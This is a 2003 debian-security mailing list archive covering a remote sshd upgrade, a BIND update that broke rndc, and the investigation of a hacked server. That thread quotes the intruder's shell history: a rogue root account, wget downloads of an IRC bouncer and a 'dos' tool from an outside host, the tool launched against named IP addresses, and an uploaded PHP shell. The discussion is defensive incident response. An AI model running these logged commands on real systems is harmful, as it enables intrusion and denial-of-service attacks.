Re: Remote update of ssh(d)

2003-09-18 Thread Philipp Hartmann 
Hi again,

On Thu, 2003-09-18 at 12:32, Philipp Hartmann wrote:

> Afterwards I noticed, that the Version which sshd reports was still
> the old one. /etc/init.d/ssh restart seemed to have no effect.
> Presumably caused by my ssh connection, which was ((and had to be) still
> established. The top process of sshd was not killed/replaced.

Everything works fine now.
I found the problem: The file /var/run/sshd.pid was missing.
Why? Actually, I don't know. This shouldn't happen and it took a while
to get the clue.
But this has been the reason for the error.

Sorry for any confusion or rising blood pressure I caused with my mail.

Regards,
Philipp

RE: [sec] Re: Strange segmentation faults and Zombies

2003-09-18 Thread Christian Storch 
The problem is starting >>before<<

id
mkdir /etc/.rpn
...

you should think about all what's listening on a port:
- an outdated sshd? (!)
- security updates all up to date?
- known unclosed security hole?
- some nice scripts like 'rootshell.php'? ;)
- perl without tainting checks in cgi-bin?
etc.
etc.

Christian


-Original Message-
From: Markus Schabel [mailto:[EMAIL PROTECTED]
Sent: Thursday, September 18, 2003 12:23 PM
To: debian-security@lists.debian.org
Subject: Re: [sec] Re: Strange segmentation faults and Zombies

maximilian attems wrote:
> On Thu, 18 Sep 2003, Christian Storch wrote:
>
>
>>Don't forget to try to find the potential hole first!
>>Otherwise you could have a fast recurrence.
>>[..]
>>
in /etc/.rpn theres a .bash_history with the following content:

>id
>mkdir /etc/.rpn
>ps -aux
>ps -aux | grep tbk
>kill -15292 pid
>kill 15292
>netconf
>locate httpd.conf
>cd /etc/.rpn
>ls -al
>wget
>cd /var/www/cncmap/www/upload/renegade
>ls -al
>rm -rf phpshell.php
>
> ^__^
> was this the exploited hole ?

I think so. In fact the problem is that it got there...

regards
Markus


--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact
[EMAIL PROTECTED]

Re: Remote update of ssh(d)

2003-09-18 Thread Bernd Eckenfels 
In article <[EMAIL PROTECTED]> you wrote:
> Does anyone know a more comfortable way to replace a sshd on a remote
> administrated box?

If I kill the top level istening sshd (you can extract its pid by running
"netstat -tpln | grep :22" as root) my ssh session is not dropped, and I can
restart a new one. 

You could also run a small script with nohup which does this for you.

Bernd
-- 
eckes privat - http://www.eckes.org/
Project Freefire - http://www.freefire.org/

Re: Remote update of ssh(d)

2003-09-18 Thread Jogi Hofmüller 
hi!

* Philipp Hartmann <[EMAIL PROTECTED]> [2003-09-18 12:35]:

> Afterwards I noticed, that the Version which sshd reports was still
> the old one. /etc/init.d/ssh restart seemed to have no effect.
> Presumably caused by my ssh connection, which was ((and had to be) still
> established. The top process of sshd was not killed/replaced.

i cannot confirm this. i did the same thing yesterday (remote sshd update
on several boxes). after installing the new version and a restart i logged
in using ssh -v from another console to check if

- the new version was running
- i could still log in

both things went ok.

then i closed the session from the first connection.

greetings
-- 
Jogi Hofmüller 
http://mur.at/
Tel.: +43-316-821 451 55
Fax.: +43-316-821 451 26
Erreichbar: MO, MI, DO, 10.00 - 14.00


pgpqUl9xao34Q.pgp
Description: PGP signature

Re: [sec] Re: Strange segmentation faults and Zombies

2003-09-18 Thread Markus Schabel 
Christian Storch wrote:
The problem is starting >>before<<
I think all the things >>before<< phpshell.php are done via
phpshell.php and the things you can see in the .bash_history
are only the things after he already got in.
id
mkdir /etc/.rpn
...
you should think about all what's listening on a port:
- an outdated sshd? (!)
It was a NOW outdated sshd but I believe that the new packages weren't
availiable on sunday - after getting the DSA-mails i usually update my
systems.
- security updates all up to date?
the same state as DSA announcements

- known unclosed security hole?
It seems that it was possible to upload & execute .php-files somewhere
(phpshell.php)
- some nice scripts like 'rootshell.php'? ;)
no. at least not found till now.

- perl without tainting checks in cgi-bin?
what exactly do you mean? how can i do/check that?

thanks, markus

etc.
etc.
Christian

-Original Message-
From: Markus Schabel [mailto:[EMAIL PROTECTED]
Sent: Thursday, September 18, 2003 12:23 PM
To: [EMAIL PROTECTED]
Subject: Re: [sec] Re: Strange segmentation faults and Zombies
maximilian attems wrote:

On Thu, 18 Sep 2003, Christian Storch wrote:



Don't forget to try to find the potential hole first!
Otherwise you could have a fast recurrence.
[..]

in /etc/.rpn theres a .bash_history with the following content:


id
mkdir /etc/.rpn
ps -aux
ps -aux | grep tbk
kill -15292 pid
kill 15292
netconf
locate httpd.conf
cd /etc/.rpn
ls -al
wget
cd /var/www/cncmap/www/upload/renegade
ls -al
rm -rf phpshell.php
  ^__^
was this the exploited hole ?


I think so. In fact the problem is that it got there...

regards
Markus


--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Re: Strange segmentation faults and Zombies

2003-09-18 Thread Markus Schabel 
Phillip Hofmeister wrote:
On Thu, 18 Sep 2003 at 09:08:28AM +0200, Markus Schabel wrote:

scp goodserver:/bin/gzip /bin/gzip
NO! Since there's the chance that the server got hacked I'm not
interested to give him other passwords. copied from the other server
via scp.


scp from the clean system into the dirty one.  This way he won't get
access to the clean systems because the passwd for the clean system will
not be given to the dirty one.
In fact that was what I tried to explain with "copied from the other
server via scp." and already done a lot of times...
thanks
Markus
--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Re: Strange segmentation faults and Zombies

2003-09-18 Thread Phillip Hofmeister 
On Thu, 18 Sep 2003 at 09:08:28AM +0200, Markus Schabel wrote:
> >scp goodserver:/bin/gzip /bin/gzip
> NO! Since there's the chance that the server got hacked I'm not
> interested to give him other passwords. copied from the other server
> via scp.

scp from the clean system into the dirty one.  This way he won't get
access to the clean systems because the passwd for the clean system will
not be given to the dirty one.

-- 
Phillip Hofmeister

PGP/GPG Key:
http://www.zionlth.org/~plhofmei/
wget -O - http://www.zionlth.org/~plhofmei/key.txt | gpg --import
--
Excuse #145: Short leg on process table 


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Re: Strange segmentation faults and Zombies

2003-09-18 Thread Jan Niehusmann 
On Thu, Sep 18, 2003 at 09:03:12AM +0200, Markus Schabel wrote:
> >wget www.slacks.hpg.com.br/bin/dos

That directory www.slacks.hpg.com.br/bin/ also contains some 
'interesting' files :-) Some exploits, rootkits etc.

Jan



signature.asc
Description: Digital signature

Remote update of ssh(d)

2003-09-18 Thread Philipp Hartmann 
Hi list,

I ran an update of ssh to 3.6.1p2-8 due to the recent errors in OpenSSH
on a system with remote access only.

Afterwards I noticed, that the Version which sshd reports was still
the old one. /etc/init.d/ssh restart seemed to have no effect.
Presumably caused by my ssh connection, which was ((and had to be) still
established. The top process of sshd was not killed/replaced.

The only workaround I found was the following:
- stop the firewall
- attach ssh to another port
- connect to the new port
- kill(!) the old sshd top process (ssh restart is not sufficient,   
  because the start-stop-daemon does not use this pid anymore)
- attach ssh back to port 22
- start the firewall
- kill the sshd listening on the other port

This is obviously quite annoying.

Does anyone know a more comfortable way to replace a sshd on a remote
administrated box?

Regards,

Philipp Hartmann

Re: Remote update of ssh(d)

2003-09-18 Thread Philipp Hartmann 
Hi again,

On Thu, 2003-09-18 at 12:32, Philipp Hartmann wrote:

> Afterwards I noticed, that the Version which sshd reports was still
> the old one. /etc/init.d/ssh restart seemed to have no effect.
> Presumably caused by my ssh connection, which was ((and had to be) still
> established. The top process of sshd was not killed/replaced.

Everything works fine now.
I found the problem: The file /var/run/sshd.pid was missing.
Why? Actually, I don't know. This shouldn't happen and it took a while
to get the clue.
But this has been the reason for the error.

Sorry for any confusion or rising blood pressure I caused with my mail.

Regards,
Philipp


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

RE: [sec] Re: Strange segmentation faults and Zombies

2003-09-18 Thread Christian Storch 
The problem is starting >>before<<

id
mkdir /etc/.rpn
...

you should think about all what's listening on a port:
- an outdated sshd? (!)
- security updates all up to date?
- known unclosed security hole?
- some nice scripts like 'rootshell.php'? ;)
- perl without tainting checks in cgi-bin?
etc.
etc.

Christian


-Original Message-
From: Markus Schabel [mailto:[EMAIL PROTECTED]
Sent: Thursday, September 18, 2003 12:23 PM
To: [EMAIL PROTECTED]
Subject: Re: [sec] Re: Strange segmentation faults and Zombies

maximilian attems wrote:
> On Thu, 18 Sep 2003, Christian Storch wrote:
>
>
>>Don't forget to try to find the potential hole first!
>>Otherwise you could have a fast recurrence.
>>[..]
>>
in /etc/.rpn theres a .bash_history with the following content:

>id
>mkdir /etc/.rpn
>ps -aux
>ps -aux | grep tbk
>kill -15292 pid
>kill 15292
>netconf
>locate httpd.conf
>cd /etc/.rpn
>ls -al
>wget
>cd /var/www/cncmap/www/upload/renegade
>ls -al
>rm -rf phpshell.php
>
> ^__^
> was this the exploited hole ?

I think so. In fact the problem is that it got there...

regards
Markus


--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact
[EMAIL PROTECTED]


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Re: Remote update of ssh(d)

2003-09-18 Thread Bernd Eckenfels 
In article <[EMAIL PROTECTED]> you wrote:
> Does anyone know a more comfortable way to replace a sshd on a remote
> administrated box?

If I kill the top level istening sshd (you can extract its pid by running
"netstat -tpln | grep :22" as root) my ssh session is not dropped, and I can
restart a new one. 

You could also run a small script with nohup which does this for you.

Bernd
-- 
eckes privat - http://www.eckes.org/
Project Freefire - http://www.freefire.org/


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Re: [sec] Re: Strange segmentation faults and Zombies

2003-09-18 Thread Markus Schabel 

maximilian attems wrote:

On Thu, 18 Sep 2003, Christian Storch wrote:



Don't forget to try to find the potential hole first!
Otherwise you could have a fast recurrence.
[..]


in /etc/.rpn theres a .bash_history with the following content:


id
mkdir /etc/.rpn
ps -aux
ps -aux | grep tbk
kill -15292 pid
kill 15292
netconf
locate httpd.conf
cd /etc/.rpn
ls -al
wget
cd /var/www/cncmap/www/upload/renegade
ls -al
rm -rf phpshell.php


  ^__^
was this the exploited hole ?


I think so. In fact the problem is that it got there...

regards
Markus

Re: Verisign and Bind update

2003-09-18 Thread Lukas Ruf 
-BEGIN PGP SIGNED MESSAGE-

Adrian von Bidder <[EMAIL PROTECTED]> [2003-09-18 11:21]:

> On Thursday 18 September 2003 11:01, Lukas Ruf wrote:
> > Adrian von Bidder <[EMAIL PROTECTED]> [2003-09-18 10:48]:
> > > rndc stops working for me. Anybody else seen this?
> >
> > have you checked the documentation that comes along with the update?
> >
> > > [EMAIL PROTECTED]:/etc/bind# /etc/init.d/bind9 reload
> > > rndc: connect failed: connection refused
> >
> > for me, it worked fine after doing the modifications "recommended" in
> > the short doc.
> 
> Is anything in the changelog.Debian.gz? Check. No.
> Is there a NEWS.Debian? Check. No.
> What is in README.Debian?
>  - upgrading from bind 8.x - does not apply
>  - Upgrading from earlier bind9 packages (prior to
> version 1:9.2.0-2 to be more precise) - does not apply.
> 
> No, I don't find anything that hints to this problem.
> 

I just took a look at the 3rd line of the to-be-installed
/etc/bind/named.conf where it read: 
/usr/share/doc/bind9/README.Debian.gz 

Reading this file pointed me to the way on how to solve the problem.


wbr,
Lukas
- -- 
Lukas Ruf   | Wanna know anything about raw |
 | IP?     |
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.2.3 (GNU/Linux)

iQCVAwUBP2mFgWg5P0zSC6LtAQECjAP/RPrGeUnd9SkDS62qtvB13UR7AXd3TJ58
Gi/FBL0fOtlPIum39iPg5qX4ukYKJEeXpN314jxcgHym+GVsQtwKZ4esIKVA11Bb
YD3hh8p1i18Z9sTl0dPVlZl+uHHHOyaeqjuDzHX8ARZIRG+RDR2d/8bi/f3GREkP
WxtSmHcyZYw=
=OWSl
-END PGP SIGNATURE-

Re: [sec] Re: Strange segmentation faults and Zombies

2003-09-18 Thread maximilian attems 
On Thu, 18 Sep 2003, Christian Storch wrote:

> Don't forget to try to find the potential hole first!
> Otherwise you could have a fast recurrence.
> [..]
> > > in /etc/.rpn theres a .bash_history with the following content:
> > > >id
> > > >mkdir /etc/.rpn
> > > >ps -aux
> > > >ps -aux | grep tbk
> > > >kill -15292 pid
> > > >kill 15292
> > > >netconf
> > > >locate httpd.conf
> > > >cd /etc/.rpn
> > > >ls -al
> > > >wget
> > > >cd /var/www/cncmap/www/upload/renegade
> > > >ls -al
> > > >rm -rf phpshell.php
  ^__^
was this the exploited hole ?

thx for info
a++ maks
 


--  
 free software is not free at all, and "actually a different form of monopoly"
 ARLENE MCCARTHY member of the european parliament (labour party)
 -> http://swpat.ffii.org/#guardian-nhill030619
 please pay attention avoiding software patents:
 -> http://swpat.ffii.org/index.en.html


pgpniBwCGvhFC.pgp
Description: PGP signature

Re: Remote update of ssh(d)

2003-09-18 Thread Jogi Hofmüller 
hi!

* Philipp Hartmann <[EMAIL PROTECTED]> [2003-09-18 12:35]:

> Afterwards I noticed, that the Version which sshd reports was still
> the old one. /etc/init.d/ssh restart seemed to have no effect.
> Presumably caused by my ssh connection, which was ((and had to be) still
> established. The top process of sshd was not killed/replaced.

i cannot confirm this. i did the same thing yesterday (remote sshd update
on several boxes). after installing the new version and a restart i logged
in using ssh -v from another console to check if

- the new version was running
- i could still log in

both things went ok.

then i closed the session from the first connection.

greetings
-- 
Jogi Hofmüller 
http://mur.at/
Tel.: +43-316-821 451 55
Fax.: +43-316-821 451 26
Erreichbar: MO, MI, DO, 10.00 - 14.00


pgp0.pgp
Description: PGP signature

Re: Verisign and Bind update

2003-09-18 Thread Adrian von Bidder 
On Thursday 18 September 2003 11:01, Lukas Ruf wrote:
> Adrian von Bidder <[EMAIL PROTECTED]> [2003-09-18 10:48]:
> > rndc stops working for me. Anybody else seen this?
>
> have you checked the documentation that comes along with the update?
>
> > [EMAIL PROTECTED]:/etc/bind# /etc/init.d/bind9 reload
> > rndc: connect failed: connection refused
>
> for me, it worked fine after doing the modifications "recommended" in
> the short doc.

Is anything in the changelog.Debian.gz? Check. No.
Is there a NEWS.Debian? Check. No.
What is in README.Debian?
 - upgrading from bind 8.x - does not apply
 - Upgrading from earlier bind9 packages (prior to
version 1:9.2.0-2 to be more precise) - does not apply.

No, I don't find anything that hints to this problem.

cheers
-- vbi (Yes, I could fix it - wrote so in my other mail).

-- 
No good deed goes unpunished.


pgpnyA9s9FCyy.pgp
Description: signature

Re: Verisign and Bind update

2003-09-18 Thread Adrian von Bidder 
On Thursday 18 September 2003 10:45, Adrian von Bidder wrote:

> rndc stops working for me. Anybody else seen this?
>
> [EMAIL PROTECTED]:/etc/bind# /etc/init.d/bind9 reload
> rndc: connect failed: connection refused

(yes, yes,  replying to meself...)

Ok: reason: named now runs as root instead of bind, so it couldn't read the 
rndc.key file. Is this intentional? I was upgrading from current testing.

Another thing: still missing versioned dependency on one of these libraries:
libdns10, libisc7, libisccc0, libisccfg0, liblwres1

(Dunno which one is really necessary, I just upgraded all depends after it 
complained about config file unexpected token delegation-only.)

But all in all, a very very big THANK YOU to LaMont Jones & the ISC for 
'resolving' this problem so quickly. Now I just hope Verislime doesn't start 
to dynamically generate delegations, too...

greets
-- vbi


-- 
precious


pgpV8GQaNUCUc.pgp
Description: signature

Re: Verisign and Bind update

2003-09-18 Thread Lukas Ruf 
-BEGIN PGP SIGNED MESSAGE-

Adrian von Bidder <[EMAIL PROTECTED]> [2003-09-18 10:48]:

> On Wednesday 17 September 2003 17:26, Ilkka Tuohela wrote:
> > ke, 2003-09-17 kello 18:12, James Miller kirjoitti:
> > > Will the package maintainers of BIND be integrating the patches from
> > > ISC-BIND to negate  Verisign's recent shenanigans?
> >
> > Well, it's not only a patch, it's part of bind upstream releases, so yes
> > of course it will eventually be in the packaged version.
> >
> > Actually, there already seems to be a release with this available.
> 
> rndc stops working for me. Anybody else seen this?
> 

have you checked the documentation that comes along with the update?

> [EMAIL PROTECTED]:/etc/bind# /etc/init.d/bind9 reload
> rndc: connect failed: connection refused
> 

for me, it worked fine after doing the modifications "recommended" in
the short doc.

wbr,
Lukas
- -- 
Lukas Ruf   | Wanna know anything about raw |
 | IP?     |
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.2.3 (GNU/Linux)

iQCVAwUBP2l0eWg5P0zSC6LtAQGgXAP/br/9I3W6CymnbJ4SRKNz0U20E5D5CkAL
3ITJKHhJidsmayKQ5ICcOhMJpBbcm+tQbg+ADy3rHQ6Hkl56RTFecd2FhaeAzlGV
4+PQSu6cNpgh0Cw13mD1hpH3qxFyt2kuAsaBEhmLksQOSvBGORRVlEE3fKX0lulr
9HTwTHnbf4s=
=8lB7
-END PGP SIGNATURE-

Re: Verisign and Bind update

2003-09-18 Thread Adrian von Bidder 
On Wednesday 17 September 2003 17:26, Ilkka Tuohela wrote:
> ke, 2003-09-17 kello 18:12, James Miller kirjoitti:
> > Will the package maintainers of BIND be integrating the patches from
> > ISC-BIND to negate  Verisign's recent shenanigans?
>
> Well, it's not only a patch, it's part of bind upstream releases, so yes
> of course it will eventually be in the packaged version.
>
> Actually, there already seems to be a release with this available.

rndc stops working for me. Anybody else seen this?

[EMAIL PROTECTED]:/etc/bind# /etc/init.d/bind9 reload
rndc: connect failed: connection refused


cheers
-- vbi

-- 
All bridge hands are equally likely, but some are more equally likely
than others.
-- Alan Truscott


pgpaPC97sp98K.pgp
Description: signature

Re: Strange segmentation faults and Zombies

2003-09-18 Thread Jan Niehusmann 
On Thu, Sep 18, 2003 at 09:03:12AM +0200, Markus Schabel wrote:
> >wget www.slacks.hpg.com.br/bin/dos

That directory www.slacks.hpg.com.br/bin/ also contains some 
'interesting' files :-) Some exploits, rootkits etc.

Jan



signature.asc
Description: Digital signature

Re: Strange segmentation faults and Zombies

2003-09-18 Thread Christian Storch 
Don't forget to try to find the potential hole first!
Otherwise you could have a fast recurrence.

Christian

- Original Message -
From: "Josh Carroll" <[EMAIL PROTECTED]>
To: 
Sent: Thursday, September 18, 2003 9:12 AM
Subject: Re: Strange segmentation faults and Zombies


> Backup /etc and any other data you have, and you can reference your 
> configuration files later
> during your re-install.
>
> At this point, re-installation is a must. Never delude yourself into thinking 
> you can 'recover'
> from being rooted. Sure, you might be able to do so after a lot of 
> effort/etc, but then again
maybe
> you'll forget something and a backdoor will remain. Best bet is to 
> re-install, referencing your
> existing configuration files (though I would NOT use them as-is without 
> inspection, since they
> could potentially have backdoor'd the configs as well).
>
> Good luck.
>
> Josh
>
>
> Markus Schabel ([EMAIL PROTECTED]) wrote:
> > Laurent Corbes {Caf'} wrote:
> > >On Wed, 17 Sep 2003 22:29:58 +0200
> > >Markus Schabel <[EMAIL PROTECTED]> wrote:
> > >
> > >
> > >>I've seen some strange things on my (stable with security-updates)
> > >>server: the last apt-get update didn't work because gzip segfaultet.
> > >>I've copied gzip from another server over the version on this server,
> > >>but it also crashed. Interesting was that the executable was bigger
> > >>after the segfault.
> > >
> > >
> > >curious.
> > >
> > >
> > >>In a ps I can see a lot of Zombies (rm, ln, readlink, grep) and I've no
> > >>idea where they come from.
> > >
> > >
> > >it's the daily cronjob that stole.
> >
> > yes, and that's reproducable :(
> >
> > >>You think the server got hacked? Are there any other things that can
> > >>lead to this? man also behaves strange, it says either "No manual entry
> > >>for...", "What manual page do you want?" or nothing.
> > >
> > >
> > >i'm thinking about a hardware problem.
> > >may the harddrive is in failure (get the ouput of dmesg) or a very big
> > >ram problem that corrupt files on the hard drive.
> >
> > request_module[net-pf-14]: waitpid(15400,...) failed, errno 1
> > ptrace uses obsolete (PF_INET,SOCK_PACKET)
> > eth0: Promiscuous mode enabled.
> > device eth0 entered promiscuous mode
> > eth0: Promiscuous mode enabled.
> >
> > but nothing about the disks
> >
> > >in every case simply copy all the data you can and inspect the hdd in
> > >another box mounting it read only.
> >
> > setuid.changes lists /dev/* and the following programs:
> > pppd
> > postdrop
> > postqueue
> > wall
> > newgrp
> > at
> > chage
> > chfn
> > chsh
> > expiry
> > gpasswd
> > passwd
> > write
> > crontab
> > dotlockfile
> > ssh-keysign
> > procmail
> > lockfile
> > popauth
> > pt_chown
> > traceroute
> > mount
> > umount
> > login
> > su
> > ping
> > suexec
> > /usr/lib/mc/bin/cons.saver
> >
> > and a new user exists in /etc/passwd: slacks:x:0:0::/etc/.rpn:/bin/bash
> >
> > in /etc/.rpn theres a .bash_history with the following content:
> >
> > >id
> > >mkdir /etc/.rpn
> > >ps -aux
> > >ps -aux | grep tbk
> > >kill -15292 pid
> > >kill 15292
> > >netconf
> > >locate httpd.conf
> > >cd /etc/.rpn
> > >ls -al
> > >wget
> > >cd /var/www/cncmap/www/upload/renegade
> > >ls -al
> > >rm -rf phpshell.php
> > >cat bd.c
> > >gcc -o bd bd.c
> > >ftp ftp.hpg.com.br
> > >rm -rf bd.c
> > >cd /tmp
> > >cd /etc/.rpn
> > >wget www.slacks.hpg.com.br/psyBNC.tar.gz
> > >tar zvxf psyBNC.tar.gz
> > >tar -zvxf psyBNC.tar.gz
> > >tar
> > >gunzip psyBNC.tar.gz
> > >tar -Acdtrux psyBNC.tar.gz
> > >tar -x psyBNC.tar.gz
> > >tar -Acd psyBNC.tar.gz
> > >tar -cd psyBNC.tar.gz
> > >tar --help
> > >pwd
> > >ls
> > >rm -rf *
> > >wget www.slacks.hpg.com.br/bin/dos
> > >chmod +x dos
> > >./dos
> > >./dos 200.101.87.8 65535 8569
> > >./dos 200.199.95.11 65535 8569
> >
> > and the executable dos
> >
> > interesting is the line "tar --help" :D
> >
> > in "last" I see the following:
> >
> > >slacks   pts/0Sun Sep 14 02:26 - 03:37  (01:11)
> > >200-147-107-35.tlm.dialuol.com.br
> >
> > IP of the hacker is 200.147.107.35
> > I think we have no chance of legal actions against .br?
> >
> > in the directory /var/www/cncmap/www/upload/renegade there are the
> > following files: backhole.pl
> > e.c ("Copyright (c) 2003 DTORS Security, ANGELO ROSIELLO 18/02/2003,
> > LES-EXPLOIT for Linux x86")
> > rem.php (phpRemoteView)
> >
> > so we got hacked :(
> >
> > what informations should we gather before we reinstall the complete
> > server? I think we have to reinstall the whole thing or do you have
> > any ideas?
> >
> > thanks
> > Markus
> >
> >
> > --
> > To UNSUBSCRIBE, email to [EMAIL PROTECTED]
> > with a subject of "unsubscribe". Trouble? Contact
> > [EMAIL PROTECTED]
> >
>
>
> --
> To UNSUBSCRIBE, email to [EMAIL PROTECTED]
> with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
>

Remote update of ssh(d)

2003-09-18 Thread Philipp Hartmann 
Hi list,

I ran an update of ssh to 3.6.1p2-8 due to the recent errors in OpenSSH
on a system with remote access only.

Afterwards I noticed, that the Version which sshd reports was still
the old one. /etc/init.d/ssh restart seemed to have no effect.
Presumably caused by my ssh connection, which was ((and had to be) still
established. The top process of sshd was not killed/replaced.

The only workaround I found was the following:
- stop the firewall
- attach ssh to another port
- connect to the new port
- kill(!) the old sshd top process (ssh restart is not sufficient,   
  because the start-stop-daemon does not use this pid anymore)
- attach ssh back to port 22
- start the firewall
- kill the sshd listening on the other port

This is obviously quite annoying.

Does anyone know a more comfortable way to replace a sshd on a remote
administrated box?

Regards,

Philipp Hartmann




-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Re: [sec] Re: Strange segmentation faults and Zombies

2003-09-18 Thread Markus Schabel 
maximilian attems wrote:
On Thu, 18 Sep 2003, Christian Storch wrote:


Don't forget to try to find the potential hole first!
Otherwise you could have a fast recurrence.
[..]
in /etc/.rpn theres a .bash_history with the following content:

id
mkdir /etc/.rpn
ps -aux
ps -aux | grep tbk
kill -15292 pid
kill 15292
netconf
locate httpd.conf
cd /etc/.rpn
ls -al
wget
cd /var/www/cncmap/www/upload/renegade
ls -al
rm -rf phpshell.php
  ^__^
was this the exploited hole ?
I think so. In fact the problem is that it got there...

regards
Markus
--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Re: Verisign and Bind update

2003-09-18 Thread Lukas Ruf 
-BEGIN PGP SIGNED MESSAGE-

Adrian von Bidder <[EMAIL PROTECTED]> [2003-09-18 11:21]:

> On Thursday 18 September 2003 11:01, Lukas Ruf wrote:
> > Adrian von Bidder <[EMAIL PROTECTED]> [2003-09-18 10:48]:
> > > rndc stops working for me. Anybody else seen this?
> >
> > have you checked the documentation that comes along with the update?
> >
> > > [EMAIL PROTECTED]:/etc/bind# /etc/init.d/bind9 reload
> > > rndc: connect failed: connection refused
> >
> > for me, it worked fine after doing the modifications "recommended" in
> > the short doc.
> 
> Is anything in the changelog.Debian.gz? Check. No.
> Is there a NEWS.Debian? Check. No.
> What is in README.Debian?
>  - upgrading from bind 8.x - does not apply
>  - Upgrading from earlier bind9 packages (prior to
> version 1:9.2.0-2 to be more precise) - does not apply.
> 
> No, I don't find anything that hints to this problem.
> 

I just took a look at the 3rd line of the to-be-installed
/etc/bind/named.conf where it read: 
/usr/share/doc/bind9/README.Debian.gz 

Reading this file pointed me to the way on how to solve the problem.


wbr,
Lukas
- -- 
Lukas Ruf   | Wanna know anything about raw |
 | IP?     |
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.2.3 (GNU/Linux)

iQCVAwUBP2mFgWg5P0zSC6LtAQECjAP/RPrGeUnd9SkDS62qtvB13UR7AXd3TJ58
Gi/FBL0fOtlPIum39iPg5qX4ukYKJEeXpN314jxcgHym+GVsQtwKZ4esIKVA11Bb
YD3hh8p1i18Z9sTl0dPVlZl+uHHHOyaeqjuDzHX8ARZIRG+RDR2d/8bi/f3GREkP
WxtSmHcyZYw=
=OWSl
-END PGP SIGNATURE-


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Re: [sec] Re: Strange segmentation faults and Zombies

2003-09-18 Thread maximilian attems 
On Thu, 18 Sep 2003, Christian Storch wrote:

> Don't forget to try to find the potential hole first!
> Otherwise you could have a fast recurrence.
> [..]
> > > in /etc/.rpn theres a .bash_history with the following content:
> > > >id
> > > >mkdir /etc/.rpn
> > > >ps -aux
> > > >ps -aux | grep tbk
> > > >kill -15292 pid
> > > >kill 15292
> > > >netconf
> > > >locate httpd.conf
> > > >cd /etc/.rpn
> > > >ls -al
> > > >wget
> > > >cd /var/www/cncmap/www/upload/renegade
> > > >ls -al
> > > >rm -rf phpshell.php
  ^__^
was this the exploited hole ?

thx for info
a++ maks
 


--  
 free software is not free at all, and "actually a different form of monopoly"
 ARLENE MCCARTHY member of the european parliament (labour party)
 -> http://swpat.ffii.org/#guardian-nhill030619
 please pay attention avoiding software patents:
 -> http://swpat.ffii.org/index.en.html


pgp0.pgp
Description: PGP signature

Re: about sendmail hole - relay restrictions bypassed

2003-09-18 Thread Jeremy T. Bouse 
In all fairness, if this issue is in regards to the Verisign cluster
fsck I don't think this has any place in Sendmail personally but rather
in getting Verisign to un-fsck the problem and/or fix DNS servers not to
respond in that manner as to allow that to happen...

Regards,
Jeremy

On Thu, Sep 18, 2003 at 12:49:38PM +0900, Hideki Yamane wrote:
> Hi list,
> 
>  You know, as DSA-384-1, sendmail buffer overflow vulnerability
>  is fixed but another hole "sendmail relay access restrictions 
>  can be bypassed with bogus DNS"(*) is NOT fixed yet.
> 
>  * http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=174907
> 
>  Do you know why maintainer let this issue alone ?
>  or not effect Debian package? (if so, this bug should be closed.)
> 
> -- 
> Regards,
> 
>  Hideki Yamanemailto:henrich @ iijmio-mail.jp
> 
> 
> -- 
> To UNSUBSCRIBE, email to [EMAIL PROTECTED]
> with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
> 


signature.asc
Description: Digital signature

Re: Verisign and Bind update

2003-09-18 Thread Adrian von Bidder 
On Thursday 18 September 2003 11:01, Lukas Ruf wrote:
> Adrian von Bidder <[EMAIL PROTECTED]> [2003-09-18 10:48]:
> > rndc stops working for me. Anybody else seen this?
>
> have you checked the documentation that comes along with the update?
>
> > [EMAIL PROTECTED]:/etc/bind# /etc/init.d/bind9 reload
> > rndc: connect failed: connection refused
>
> for me, it worked fine after doing the modifications "recommended" in
> the short doc.

Is anything in the changelog.Debian.gz? Check. No.
Is there a NEWS.Debian? Check. No.
What is in README.Debian?
 - upgrading from bind 8.x - does not apply
 - Upgrading from earlier bind9 packages (prior to
version 1:9.2.0-2 to be more precise) - does not apply.

No, I don't find anything that hints to this problem.

cheers
-- vbi (Yes, I could fix it - wrote so in my other mail).

-- 
No good deed goes unpunished.


pgp0.pgp
Description: signature

Re: Strange segmentation faults and Zombies

2003-09-18 Thread Josh Carroll 
Backup /etc and any other data you have, and you can reference your 
configuration files later
during your re-install.

At this point, re-installation is a must. Never delude yourself into thinking 
you can 'recover'
from being rooted. Sure, you might be able to do so after a lot of effort/etc, 
but then again maybe
you'll forget something and a backdoor will remain. Best bet is to re-install, 
referencing your
existing configuration files (though I would NOT use them as-is without 
inspection, since they
could potentially have backdoor'd the configs as well).

Good luck.

Josh


Markus Schabel ([EMAIL PROTECTED]) wrote:
> Laurent Corbes {Caf'} wrote:
> >On Wed, 17 Sep 2003 22:29:58 +0200
> >Markus Schabel <[EMAIL PROTECTED]> wrote:
> >
> >
> >>I've seen some strange things on my (stable with security-updates)
> >>server: the last apt-get update didn't work because gzip segfaultet.
> >>I've copied gzip from another server over the version on this server,
> >>but it also crashed. Interesting was that the executable was bigger
> >>after the segfault.
> >
> >
> >curious.
> >
> >
> >>In a ps I can see a lot of Zombies (rm, ln, readlink, grep) and I've no
> >>idea where they come from.
> >
